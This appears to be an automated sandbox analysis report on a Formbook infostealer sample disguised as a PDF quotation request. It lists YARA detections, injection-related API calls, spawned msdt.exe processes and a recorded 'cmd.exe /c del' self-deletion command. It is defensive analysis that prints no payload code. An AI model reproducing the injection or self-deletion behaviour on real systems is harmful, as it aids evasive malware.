Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 0_2_018FC694
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 0_2_018FEAC8
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 0_2_018FEAD8
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041D96B
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_004012FB
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041EB91
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041DC7D
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00402D87
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00409E5F
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00409E60
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046CD466
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0461841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D1D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04600D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D2D07
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0461D5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D25DD
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04632581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04626E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046CD616
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D2EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D1FF1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046DDFCE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046DE824
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046C1002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D28EC
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046320A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D20A8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0461B090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04624120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0460F900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046BFA2B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D22AE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0462AB40
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046D2B28
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046C03DA
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046CDBD2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0463EBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013EB91
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_00122D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_00122D87
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_00129E5F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_00129E60
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_00122FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0460B150 appears 45 times
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A3B3 NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A40B NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Code function: 6_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0464AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0464A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0464A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0464B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_046499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_04649B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0464A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A490 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A3B3 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A40B NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 10_2_0013A53A NtAllocateVirtualMemory,
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.303421027.00000000065B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.299924713.0000000000F8E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000004.00000002.295521309.00000000000FE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000000.296575985.0000000000DBE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373544192.0000000001A0F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Binary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Virustotal: Detection: 40%
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Solicitud urgente de Quotaion_U1197,pdf.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@3/3
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
